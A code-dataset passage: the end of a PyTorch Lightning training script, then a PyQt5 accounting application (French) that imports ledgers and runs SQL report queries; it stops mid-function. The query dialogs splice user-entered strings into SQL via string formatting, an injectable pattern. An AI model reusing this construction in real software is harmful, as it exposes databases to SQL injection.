\"v2_0.2\"\n)\nargs['trans_train'] = A.Compose([\n A.Resize(args['image_size'], args['image_size']),\n A.HorizontalFlip(),\n A.VerticalFlip(),\n A.RandomRotate90(),\n A.GridDistortion(),\n A.PiecewiseAffine(),\n A.Normalize([0], [1]),\n ToTensorV2()])\nargs['trans_valid'] = A.Compose([\n A.Resize(args['image_size'], args['image_size']),\n A.Normalize([0], [1]),\n ToTensorV2()])\n\nif __name__ == \"__main__\":\n logger = TensorBoardLogger(\"./logs\", name = args[\"name\"], version = args[\"version\"], default_hp_metric = False)\n callback = pl.callbacks.ModelCheckpoint(\n filename = '{epoch}_{valid_metric:.3f}',\n save_last = True,\n mode = \"max\",\n monitor = 'valid_metric'\n )\n model = Model(**args)\n trainer = pl.Trainer(\n gpus = len(gpus.split(\",\")), \n precision = 16, amp_backend = \"native\", amp_level = \"O1\", \n accelerator = \"dp\",\n gradient_clip_val = 10,\n max_epochs = args[\"num_epochs\"],\n stochastic_weight_avg = args[\"swa\"],\n logger = logger,\n progress_bar_refresh_rate = 10,\n callbacks = [callback]\n )\n trainer.fit(model)","sub_path":"Solver_OCT.py","file_name":"Solver_OCT.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63517781","text":"#-*- coding: utf-8 -*-\r\n\r\n'''\r\nCreated on 19 janv. 2016\r\n\r\n@author: acremieux\r\n'''\r\n\r\n#Imports from the Python library\r\nimport os\r\nimport sys\r\nimport csv\r\nimport time\r\nimport itertools\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets;\r\nimport modelmanager.connect_dic as con_dic;\r\nimport modelmanager.db_manager as mngr;\r\nimport datastream.type_functions as tf;\r\nimport view.table_tree_view as treeView;\r\nimport datastream.glob as glob;\r\nfrom PyQt5.Qt import QStandardItemModel, QVariant, QFileDialog, QDialog\r\nfrom PyQt5.Qt import QMessageBox, QInputDialog\r\nfrom view.query_view_table import QueryViewTable\r\nfrom test.test_binop import isint\r\nimport functools\r\nfrom datastream.glob import chart_account_ext\r\nfrom sys import stdin, stdout\r\n\r\n\r\nclass Ui_iris_main(object):\r\n \r\n def setupUi(self, iris_main, conDic : con_dic.ConnectInfos, table_year, year_dimension):\r\n #Init Central windows\r\n self._main_windows = iris_main;\r\n self._init_windows(iris_main);\r\n self.centralwidget = self._init_central_widget(iris_main);\r\n self.gridLayout = self._init_grid_layout(self.centralwidget);\r\n iris_main.setCentralWidget(self.centralwidget);\r\n \r\n #Central splitter : left for the treeview, right for the tab view\r\n self.mainSplitter = self._init_main_splitter(self.centralwidget);\r\n self.leftLayoutWdg = self._init_left_layout(self.mainSplitter);\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(2)\r\n sizePolicy.setVerticalStretch(0)\r\n self.leftLayoutWdg.setSizePolicy(sizePolicy);\r\n self.rightLayoutWdg = self._init_right_layout(self.mainSplitter);\r\n self.gridLayout.addWidget(self.mainSplitter, 0, 0, 1, 1)\r\n self.leftLayoutWdg.raise_()\r\n self.rightLayoutWdg.raise_()\r\n \r\n #Tree view declarations\r\n self.tablesTreeLayout = self._init_tables_tree_layout(self.leftLayoutWdg);\r\n self.tablesTreeView = None;\r\n \r\n #Tab view declarations\r\n self.tabViewLayout = self._init_tab_view_layout(self.rightLayoutWdg);\r\n self.tabWidget = None;\r\n self.queryTabs = [];\r\n self.queryViews = [];\r\n \r\n #Initiate menubar and menubar's menus and menus' actions\r\n self.menubar = 
QtWidgets.QMenuBar(iris_main)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1024, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n self.menuFichier = QtWidgets.QMenu(self.menubar)\r\n self.menuFichier.setObjectName(\"menuFichier\")\r\n self.menuYear = QtWidgets.QMenu(self.menubar)\r\n self.menuYear.setObjectName(\"menuYear\")\r\n self.menuRqt = QtWidgets.QMenu(self.menubar)\r\n self.menuRqt.setObjectName(\"menuRqt\")\r\n iris_main.setMenuBar(self.menubar)\r\n \r\n self.showAnalyticsBook = QtWidgets.QAction(iris_main);\r\n self.showAnalyticsBook.setObjectName(\"showAnalyticsBook\");\r\n self.showAnalyticsBook.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Grand livre analytique\",\r\n \"sqlscript/gd_livre_analytique.txt\",\r\n [['Entrez l\\'année : ', 'i']]));\r\n \r\n self.showGeneralEntries = QtWidgets.QAction(iris_main);\r\n self.showGeneralEntries.setObjectName(\"showGeneralEntries\");\r\n self.showGeneralEntries.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Visionner un compte général\",\r\n \"sqlscript/ecriture_compte.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez le numéro de compte : ', 'i']]));\r\n \r\n self.showGeneralBook = QtWidgets.QAction(iris_main);\r\n self.showGeneralBook.setObjectName(\"showGeneralBook\");\r\n self.showGeneralBook.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Grand livre general\",\r\n \"sqlscript/gd_livre_general.txt\",\r\n [['Entrez l\\'année : ', 'i']]));\r\n \r\n self.showClientEntries = QtWidgets.QAction(iris_main);\r\n self.showClientEntries.setObjectName(\"showClientEntries\");\r\n self.showClientEntries.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures client\",\r\n \"sqlscript/ecriture_client.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez le code client : ', 's']]));\r\n \r\n \r\n self.showAnalyticsEntries = QtWidgets.QAction(iris_main);\r\n self.showAnalyticsEntries.setObjectName(\"showAnalyticsEntries\");\r\n self.showAnalyticsEntries.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures activité\",\r\n \"sqlscript/ecriture_analytique.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez le code de l\\'activité : ', 's']]));\r\n \r\n \r\n self.showClientAccount = QtWidgets.QAction(iris_main);\r\n self.showClientAccount.setObjectName(\"showClientAccount\");\r\n self.showClientAccount.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures d'un compte pour un client\",\r\n \"sqlscript/ecriture_compte_client.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez le code du client : ', 's'],\r\n ['Entrez le numéro de compte : ', 'i']]));\r\n \r\n self.showAnalyticsAccount = QtWidgets.QAction(iris_main);\r\n self.showAnalyticsAccount.setObjectName(\"showAnalyticsAccount\");\r\n self.showAnalyticsAccount.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures d'un compte pour une activité\",\r\n \"sqlscript/ecriture_compte_activite.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez l\\'activité : ', 's'],\r\n ['Entrez le numéro de compte : ', 'i']]));\r\n \r\n self.showReportPlan = QtWidgets.QAction(iris_main);\r\n self.showReportPlan.setObjectName(\"showReportPlan\");\r\n self.showReportPlan.triggered.connect(functools.partial(self._query_from_file,\r\n \"Plan reporting\",\r\n \"sqlscript/plan_reporting.txt\"));\r\n \r\n self.showUnbalancedAnalytics = QtWidgets.QAction(iris_main);\r\n 
self.showUnbalancedAnalytics.setObjectName(\"showUnbalancedAnalytics\");\r\n self.showUnbalancedAnalytics.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures analytiques non équilibrées\",\r\n \"sqlscript/ecriture_analytique_non_equilibree.txt\",\r\n [['Entrez l\\'année : ', 'i']],\r\n True));\r\n \r\n self.showMissingAnalytics = QtWidgets.QAction(iris_main);\r\n self.showMissingAnalytics.setObjectName(\"showMissingAnalytics\");\r\n self.showMissingAnalytics.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Ecritures analytiques non renseignées\",\r\n \"sqlscript/ecriture_non_ventilee_analytique.txt\",\r\n [['Entrez l\\'année : ', 'i']],\r\n True));\r\n \r\n self.openLogFile = QtWidgets.QAction(iris_main)\r\n self.openLogFile.setObjectName(\"openLogFile\")\r\n self.createLogFile = QtWidgets.QAction(iris_main)\r\n self.createLogFile.setObjectName(\"createLogFile\")\r\n self.modLogFile = QtWidgets.QAction(iris_main)\r\n self.modLogFile.setObjectName(\"modLogFile\")\r\n \r\n self.importBook = QtWidgets.QAction(iris_main)\r\n self.importBook.setObjectName(\"importBook\")\r\n self.importBook.triggered.connect(functools.partial(self._import_from_file, \r\n glob.PATH[glob.accounting_book], \r\n glob.TABLES_NAMES['grand_livre'], \r\n \"Importer un grand livre au format SAGE - csv\"));\r\n \r\n self.exportBookCSV = QtWidgets.QAction(iris_main)\r\n self.exportBookCSV.setObjectName(\"exportBookCSV\")\r\n \r\n self.importChartAccount = QtWidgets.QAction(iris_main)\r\n self.importChartAccount.setObjectName(\"importChartAccount\")\r\n self.importChartAccount.triggered.connect(functools.partial(self._import_from_file, \r\n glob.PATH[glob.chart_account_ext],\r\n glob.TABLES_NAMES['plan_comptable'],\r\n \"Importer un plan comptable\"));\r\n \r\n self.importAnalyticsAccount = QtWidgets.QAction(iris_main)\r\n self.importAnalyticsAccount.setObjectName(\"importAnalyticsAccount\")\r\n targets_tables = [];\r\n targets_tables.append(glob.TABLES_NAMES['analytics_plan']);\r\n targets_tables.append(glob.TABLES_NAMES['analytics_section']);\r\n targets_tables.append(glob.TABLES_NAMES['analytics_activity']);\r\n targets_tables.append(glob.TABLES_NAMES['analytics_relation']);\r\n self.importAnalyticsAccount.triggered.connect(functools.partial(self._import_splitted_file,\r\n glob.PATH[glob.analytics_account_ext],\r\n targets_tables,\r\n \"Importer un plan analytique\"));\r\n \r\n self.importReportingAccount = QtWidgets.QAction(iris_main)\r\n self.importReportingAccount.setObjectName(\"importReportingAccount\")\r\n targets_tables = [];\r\n targets_tables.append(glob.TABLES_NAMES['report_page']);\r\n targets_tables.append(glob.TABLES_NAMES['report_rubric']);\r\n targets_tables.append(glob.TABLES_NAMES['report_title']);\r\n targets_tables.append(glob.TABLES_NAMES['report_subtitle']);\r\n self.importReportingAccount.triggered.connect(functools.partial(self._import_splitted_file,\r\n glob.PATH[glob.chart_account_ext], \r\n targets_tables,\r\n \"Importer un plan reporting\"));\r\n \r\n self.importReportingRel = QtWidgets.QAction(iris_main);\r\n self.importReportingRel.setObjectName(\"editReportingRel\");\r\n self.importReportingRel.triggered.connect(functools.partial(self._import_from_file,\r\n glob.PATH[glob.chart_account_ext],\r\n glob.TABLES_NAMES['report_relation'],\r\n \"Importer une ventilation des comptes de reporting\"));\r\n \r\n self.quit = QtWidgets.QAction(iris_main)\r\n self.quit.setObjectName(\"quit\")\r\n self.menuFichier.addAction(self.openLogFile)\r\n 
self.menuFichier.addAction(self.createLogFile)\r\n self.menuFichier.addAction(self.modLogFile)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importBook)\r\n self.menuFichier.addAction(self.exportBookCSV)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importChartAccount)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importAnalyticsAccount)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importReportingAccount)\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.importReportingRel);\r\n self.menuFichier.addSeparator()\r\n self.menuFichier.addAction(self.quit)\r\n \r\n self.menuRqt.addAction(self.showAnalyticsBook)\r\n self.menuRqt.addAction(self.showReportPlan)\r\n self.menuRqt.addSeparator()\r\n self.menuRqt.addAction(self.showGeneralBook)\r\n self.menuRqt.addAction(self.showGeneralEntries)\r\n self.menuRqt.addSeparator()\r\n self.menuRqt.addAction(self.showClientEntries)\r\n self.menuRqt.addAction(self.showClientAccount)\r\n self.menuRqt.addSeparator()\r\n self.menuRqt.addAction(self.showAnalyticsEntries)\r\n self.menuRqt.addAction(self.showAnalyticsAccount)\r\n self.menuRqt.addSeparator()\r\n self.menuRqt.addAction(self.showUnbalancedAnalytics)\r\n self.menuRqt.addAction(self.showMissingAnalytics)\r\n \r\n self.menubar.addAction(self.menuFichier.menuAction())\r\n self.menubar.addAction(self.menuYear.menuAction())\r\n self.menubar.addAction(self.menuRqt.menuAction())\r\n \r\n #Initiate statusbar\r\n self.statusbar = QtWidgets.QStatusBar(iris_main)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n iris_main.setStatusBar(self.statusbar)\r\n \r\n #Initiate toolbar\r\n self.toolBar = QtWidgets.QToolBar(iris_main)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.toolBar.sizePolicy().hasHeightForWidth())\r\n self.toolBar.setSizePolicy(sizePolicy)\r\n self.toolBar.setMinimumSize(QtCore.QSize(0, 30))\r\n self.toolBar.setObjectName(\"toolBar\")\r\n iris_main.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)\r\n \r\n self.retranslateUi(iris_main)\r\n QtCore.QMetaObject.connectSlotsByName(iris_main)\r\n \r\n #INIT INFOS FROM THE MODEL\r\n #Init condic : connection with the database\r\n self._condic = conDic;\r\n self._db = mngr.DbManager(self._condic, 8889);\r\n \r\n if (self._db.error == False):\r\n #Fetch available table names and table infos\r\n self._db.init_tables();\r\n self._tables_names = self._db.tables_names;\r\n self._tables_desc = None;\r\n self._tables_head = None;\r\n self._fetch_tables_description();\r\n \r\n #Fetch available years and initialize the years menu\r\n #self._db.execute_query(\"SELECT DISTINCT YEAR(date_inscription) FROM tbl_client_pgrm;\");\r\n self._year_table = table_year;\r\n self._year_dimension = year_dimension;\r\n self._years = self._db.fetch_year_dimension(self._year_table, self._year_dimension);\r\n self._db.close_cursor();\r\n \r\n if (self._db.error == False):\r\n self._init_year_menu(iris_main);\r\n \r\n \r\n def retranslateUi(self, iris_main):\r\n _translate = QtCore.QCoreApplication.translate\r\n iris_main.setWindowTitle(_translate(\"iris_main\", \"Iris for EDE\"))\r\n \r\n self.menuFichier.setTitle(_translate(\"iris_main\", \"Fichier\"))\r\n self.menuYear.setTitle(_translate(\"iris_main\", \"Année\"))\r\n self.menuRqt.setTitle(_translate(\"iris_main\", \"Requêtes\"))\r\n 
\r\n self.toolBar.setWindowTitle(_translate(\"iris_main\", \"toolBar\"))\r\n \r\n self.showAnalyticsBook.setText(_translate(\"iris_main\", \"Afficher un grand livre analytique complet\"))\r\n self.showGeneralEntries.setText(_translate(\"iris_main\", \"Afficher les écritures pour un compte spécifique\"))\r\n self.showGeneralBook.setText(_translate(\"iris_main\", \"Afficher les écritures du grand livre général\"))\r\n self.showClientEntries.setText(_translate(\"iris_main\", \"Afficher les écritures analytique pour un client\"))\r\n self.showAnalyticsEntries.setText(_translate(\"iris_main\", \"Afficher les écritures analytiques pour une activité\"))\r\n self.showClientAccount.setText(_translate(\"iris_main\", \"Afficher les écritures d\\'un compte pour un client\"))\r\n self.showAnalyticsAccount.setText(_translate(\"iris_main\", \"Afficher les écritures d\\'un compte pour une activité\"))\r\n self.showReportPlan.setText(_translate(\"iris_main\", \"Afficher un plan reporting complet\"))\r\n self.showUnbalancedAnalytics.setText(_translate(\"iris_main\", \"Afficher les écritures analytiques non équilibrés\"))\r\n self.showMissingAnalytics.setText(_translate(\"iris_main\", \"Afficher les écritures non renseignées dans les plans\"))\r\n \r\n self.openLogFile.setText(_translate(\"iris_main\", \"Ouvrir un fichier de log\"))\r\n self.createLogFile.setText(_translate(\"iris_main\", \"Créer un fichier de log\"))\r\n self.modLogFile.setText(_translate(\"iris_main\", \"Modifier un fichier de log\"))\r\n self.importBook.setText(_translate(\"iris_main\", \"Importer un grand livre au format CSV - Sage\"))\r\n self.exportBookCSV.setText(_translate(\"iris_main\", \"Exporter un grand livre analytique au format CSV\"))\r\n self.importChartAccount.setText(_translate(\"iris_main\", \"Importer un plan comptable\"))\r\n self.importAnalyticsAccount.setText(_translate(\"iris_main\", \"Importer un plan analytique\"))\r\n self.importReportingAccount.setText(_translate(\"iris_main\", \"Importer un plan reporting\"));\r\n self.importReportingRel.setText(_translate(\"iris_main\", \"Importer une ventilation du plan de reporting\"));\r\n \r\n self.quit.setText(_translate(\"iris_main\", \"Quitter\"));\r\n# self.tabWidget.setTabText(self.tabWidget.indexOf(self.emptyTableViewTab), _translate(\"iris_main\", \"Tab 1\"))\r\n\r\n def _init_year_menu(self, parent):\r\n _translate = QtCore.QCoreApplication.translate\r\n for year in self._years:\r\n action = QtWidgets.QAction(parent);\r\n action.setObjectName(str(year));\r\n action.triggered.connect(self._init_tables_tree_view);\r\n self.menuYear.addAction(action);\r\n action.setText(_translate(\"iris_main\", str(year)));\r\n \r\n def _init_windows(self, iris_main):\r\n iris_main.setObjectName(\"iris_main\")\r\n iris_main.resize(1024, 768)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(iris_main.sizePolicy().hasHeightForWidth())\r\n iris_main.setSizePolicy(sizePolicy)\r\n iris_main.setMaximumSize(QtCore.QSize(16777215, 16777215))\r\n \r\n def _init_central_widget(self, iris_main):\r\n centralwidget = QtWidgets.QWidget(iris_main)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(centralwidget.sizePolicy().hasHeightForWidth())\r\n 
centralwidget.setSizePolicy(sizePolicy)\r\n centralwidget.setLayoutDirection(QtCore.Qt.LeftToRight)\r\n centralwidget.setObjectName(\"centralwidget\")\r\n return centralwidget;\r\n \r\n def _init_grid_layout(self, parent):\r\n gridLayout = QtWidgets.QGridLayout(parent)\r\n gridLayout.setObjectName(\"gridLayout\")\r\n return gridLayout;\r\n \r\n def _init_main_splitter(self, parent):\r\n mainSplitter = QtWidgets.QSplitter(parent)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(mainSplitter.sizePolicy().hasHeightForWidth())\r\n mainSplitter.setSizePolicy(sizePolicy)\r\n mainSplitter.setOrientation(QtCore.Qt.Horizontal)\r\n mainSplitter.setObjectName(\"mainSplitter\")\r\n return mainSplitter;\r\n \r\n def _init_left_layout(self, parent):\r\n leftLayoutWdg = QtWidgets.QWidget(parent)\r\n leftLayoutWdg.setObjectName(\"leftLayoutWdg\")\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(0)\r\n leftLayoutWdg.setSizePolicy(sizePolicy)\r\n return leftLayoutWdg;\r\n \r\n def _init_tables_tree_layout(self, parent):\r\n tablesTreeLayout = QtWidgets.QHBoxLayout(parent)\r\n tablesTreeLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)\r\n tablesTreeLayout.setContentsMargins(-1, -1, 0, -1)\r\n tablesTreeLayout.setSpacing(0)\r\n tablesTreeLayout.setObjectName(\"tablesTreeLayout\")\r\n return tablesTreeLayout;\r\n \r\n def _init_tables_tree_view(self):\r\n if (self.tablesTreeView is not None):\r\n self.tablesTreeView.deleteLater();\r\n self.tablesTreeView = None;\r\n \r\n self.tablesTreeView = treeView.TableTreeView(self._main_windows,\r\n self.leftLayoutWdg);\r\n self.tablesTreeLayout.addWidget(self.tablesTreeView);\r\n \r\n def _init_right_layout(self, parent):\r\n rightLayoutWdg = QtWidgets.QWidget(parent)\r\n rightLayoutWdg.setObjectName(\"rightLayoutWdg\")\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(3)\r\n rightLayoutWdg.setSizePolicy(sizePolicy)\r\n return rightLayoutWdg;\r\n \r\n def _init_tab_view_layout(self, parent):\r\n tabViewLayout = QtWidgets.QHBoxLayout(parent);\r\n tabViewLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint);\r\n tabViewLayout.setSpacing(0);\r\n tabViewLayout.setObjectName(\"tabViewLayout\");\r\n return tabViewLayout;\r\n \r\n def _init_tab_widget(self, parent):\r\n #Intitiates the tabWidget\r\n tabWidget = QtWidgets.QTabWidget(self.rightLayoutWdg);\r\n tabWidget.setEnabled(True);\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding);\r\n sizePolicy.setHorizontalStretch(2);\r\n sizePolicy.setVerticalStretch(1);\r\n sizePolicy.setHeightForWidth(tabWidget.sizePolicy().hasHeightForWidth());\r\n tabWidget.setSizePolicy(sizePolicy);\r\n tabWidget.setTabsClosable(True);\r\n tabWidget.tabCloseRequested.connect(self._close_tab);\r\n tabWidget.setObjectName(\"tabWidget\");\r\n return tabWidget;\r\n \r\n def _create_query_tab(self, table_name):\r\n '''\r\n Creates a new empty query tab.\r\n '''\r\n \r\n emptyTableViewTab = QtWidgets.QWidget();\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, \r\n QtWidgets.QSizePolicy.Expanding);\r\n sizePolicy.setHorizontalStretch(2);\r\n sizePolicy.setVerticalStretch(1);\r\n 
sizePolicy.setHeightForWidth(emptyTableViewTab.sizePolicy().hasHeightForWidth());\r\n emptyTableViewTab.setSizePolicy(sizePolicy);\r\n emptyTableViewTab.setObjectName(table_name);\r\n return emptyTableViewTab; \r\n\r\n def add_new_query_tab(self, table_name):\r\n \r\n #Fetch the table content from the db aka the model\r\n table_content = self._db.fetch_table_content(table_name);\r\n self.statusbar.showMessage(\"Table content fetched. Please wait while processing data...\");\r\n \r\n #Model declaration, types conversion, avoiding primary column editing\r\n model = QStandardItemModel();\r\n table_primary = self._db.table_primary(table_name);\r\n for tpl in table_content:\r\n row = [];\r\n for field, head in zip(tpl, self._tables_head[table_name]):\r\n elem = QtGui.QStandardItem(str(field))\r\n if (head in table_primary.keys()):\r\n elem.setEditable(False);\r\n row.append(elem);\r\n model.appendRow(row);\r\n \r\n model.setHorizontalHeaderLabels(self._tables_head[table_name]);\r\n \r\n #Creates the tabWidget if necessary\r\n if (self.tabWidget == None):\r\n self.tabWidget = self._init_tab_widget(self.rightLayoutWdg);\r\n self.tabViewLayout.addWidget(self.tabWidget);\r\n self.tabWidget.raise_();\r\n self.tabWidget.setCurrentIndex(0);\r\n \r\n #Creates the new tab to be added and sets up its layout\r\n queryTab = self._create_query_tab(table_name);\r\n self.queryTabs.append(queryTab);\r\n horizontalLayout = QtWidgets.QHBoxLayout(queryTab);\r\n horizontalLayout.setObjectName(table_name);\r\n verticalLayout = QtWidgets.QVBoxLayout();\r\n verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint);\r\n verticalLayout.setSpacing(0);\r\n verticalLayout.setObjectName(\"verticalLayout\");\r\n \r\n #Creates the custom QueryTableView that will handle the table content for the view\r\n try :\r\n queryTableView = QueryViewTable(table_name, self._main_windows, \r\n {\"model_changed\" : self._model_changed});\r\n\r\n queryTableView.setProxyModelSource(model);\r\n self.queryViews.append(queryTableView);\r\n \r\n #Adds the QueryTableView to the new layout included in the tabWidget\r\n verticalLayout.addWidget(queryTableView);\r\n horizontalLayout.addLayout(verticalLayout);\r\n self.tabWidget.addTab(queryTableView, table_name);\r\n self.tabWidget.setCurrentWidget(queryTableView);\r\n \r\n self.statusbar.showMessage('');\r\n \r\n except Exception as e:\r\n print(e);\r\n \r\n def _query_from_file(self, query_name, path, args = None):\r\n '''\r\n Opens a file that should contain a query and executes it. 
\r\n '''\r\n try:\r\n file = open(path, 'r');\r\n query = ''; \r\n \r\n for l in file:\r\n query += l;\r\n \r\n file.close();\r\n \r\n if (args):\r\n query = query % tuple(args);\r\n \r\n self._add_new_query_tab_from_query(query, query_name)\r\n \r\n except Exception as e:\r\n print(e);\r\n \r\n def _query_from_file_dialog(self, query_name, path, args : [], to_double = False):\r\n '''\r\n Creates several dialogs dynamically from a list of lists.\r\n Each list contains : the prompt and the type.\r\n The types = 'i' for int, 'f' for float, 's' for string.\r\n '''\r\n \r\n query_args = [];\r\n ok = True;\r\n \r\n for arg in args:\r\n val, ok = QInputDialog.getText(self, query_name, arg[0]);\r\n if (ok):\r\n if (arg[1] == 'i'):\r\n if (tf.is_integer(val)):\r\n val = int(val);\r\n query_args.append(val);\r\n \r\n else:\r\n ok = False;\r\n QMessageBox.warning(self, query_name, 'Merci de rentrer un entier.');\r\n break;\r\n \r\n elif (arg[1] == 'f'):\r\n if (tf.is_float(val)):\r\n val = float(val);\r\n query_args.append(val);\r\n \r\n else:\r\n ok = False;\r\n QMessageBox.warning(self, query_name, 'Merci de rentrer un nombre.');\r\n break;\r\n \r\n elif (arg[1] == 's'):\r\n val = '\\'' + val + '\\'';\r\n query_args.append(val);\r\n \r\n else:\r\n QMessageBox.warning(self, query_name, 'Erreur de paramètre sur le typage. Voir le code.');\r\n ok = False;\r\n break;\r\n else:\r\n break\r\n \r\n if (ok):\r\n #If the same arg is asked twice in the query\r\n if (to_double):\r\n for i in range(len(query_args)):\r\n query_args.append(query_args[i]);\r\n \r\n self._query_from_file(query_name, path, query_args);\r\n \r\n def _add_new_query_tab_from_query(self, query, query_name):\r\n '''\r\n Add a new query tab directly from a query.\r\n The rows are not editable.\r\n The user is not expected to work on the db from a simple query.\r\n '''\r\n \r\n #Fetch data from query\r\n self._db.execute_query(query);\r\n \r\n if (self._db.error):\r\n self._db.close_cursor();\r\n else:\r\n \r\n query_result = self._db.fetch_all();\r\n desc = self._db.query_description();\r\n self._db.close_cursor();\r\n \r\n if (self._db.error == False and desc != None):\r\n \r\n #Model declaration, types conversion,\r\n \r\n model = QStandardItemModel();\r\n for tpl in query_result:\r\n row = [];\r\n for field in tpl:\r\n elem = QtGui.QStandardItem(str(field));\r\n elem.setEditable(False);\r\n row.append(elem);\r\n model.appendRow(row);\r\n \r\n #Set query's headers\r\n model.setHorizontalHeaderLabels(desc);\r\n \r\n #Creates the tabWidget if necessary\r\n if (self.tabWidget == None):\r\n self.tabWidget = self._init_tab_widget(self.rightLayoutWdg);\r\n self.tabViewLayout.addWidget(self.tabWidget);\r\n self.tabWidget.raise_();\r\n self.tabWidget.setCurrentIndex(0);\r\n \r\n queryTab = self._create_query_tab(query_name);\r\n self.queryTabs.append(queryTab);\r\n horizontalLayout = QtWidgets.QHBoxLayout(queryTab);\r\n horizontalLayout.setObjectName(query_name);\r\n verticalLayout = QtWidgets.QVBoxLayout();\r\n verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint);\r\n verticalLayout.setSpacing(0);\r\n verticalLayout.setObjectName(\"verticalLayout\")\r\n \r\n #Creates the custom QueryTableView that will handle the query content for the view\r\n try :\r\n queryTableView = QueryViewTable(query_name, self._main_windows, \r\n {\"model_changed\" : self._model_changed});\r\n \r\n queryTableView.setProxyModelSource(model);\r\n self.queryViews.append(queryTableView);\r\n \r\n #Adds the QueryTableView to the new layout included in the tabWidget\r\n 
verticalLayout.addWidget(queryTableView);\r\n horizontalLayout.addLayout(verticalLayout);\r\n self.tabWidget.addTab(queryTableView, query_name);\r\n self.tabWidget.setCurrentWidget(queryTableView);\r\n \r\n self.statusbar.showMessage('');\r\n \r\n except Exception as e:\r\n print(e); \r\n\r\n def _close_tab(self, currentIndex):\r\n tabToClose = self.tabWidget.widget(currentIndex);\r\n tabToClose.deleteLater();\r\n self.tabWidget.removeTab(currentIndex);\r\n \r\n def _model_changed(self, table_name, modelIndex, model):\r\n table_primary = self._db.table_primary(table_name);\r\n table_header = self._db.table_headnames(table_name);\r\n row = modelIndex.row();\r\n col = modelIndex.column();\r\n what = {};\r\n what[table_header[col]] = modelIndex.data();\r\n where = {};\r\n for k in table_primary:\r\n where[k] = model.index(row, table_primary[k]).data();\r\n self._db.table_update(table_name, what, where);\r\n \r\n def _fetch_tables_description(self):\r\n '''\r\n Fetch description of all tables contained in the db.\r\n The descriptions are stored in memory in dictionaries and encapsulated.\r\n '''\r\n temp_desc = {};\r\n temp_headnames = {};\r\n for t in self._tables_names:\r\n temp_desc[t] = self._db.table_headers(t);\r\n temp_headnames[t] = self._db.table_headnames(t);\r\n self._tables_head = temp_headnames;\r\n self._tables_desc = temp_desc;\r\n\r\n def _open_file(self, open_file_prompt):\r\n '''\r\n Open a file with the OS GUI through Qt.\r\n The file system will show the root directory of the project.\r\n '''\r\n root_path = os.path.dirname(__file__);\r\n root_path = os.path.abspath(os.path.join(root_path, os.pardir));\r\n root_path = os.path.abspath(os.path.join(root_path, os.pardir));\r\n try :\r\n fname = QFileDialog.getOpenFileName(self, \r\n open_file_prompt, \r\n root_path);\r\n \r\n if (fname[0]):\r\n f = open(fname[0], 'r', encoding='Latin-1');\r\n else:\r\n return None, None;\r\n \r\n except Exception as e:\r\n sys.stdout.write(e);\r\n msgBox = QMessageBox();\r\n msgBox.setText(\"Une erreur est survenue lors de l\\'accès au fichier.\" \\\r\n + \"Merci de recommencer l\\'opération ou de vérifier votre système\");\r\n msgBox.exec();\r\n return None, None;\r\n \r\n return f, fname[0];\r\n \r\n def _convert_csv_to_list(self, file):\r\n '''\r\n Convert a csv to a Python list.\r\n '''\r\n chart_account = 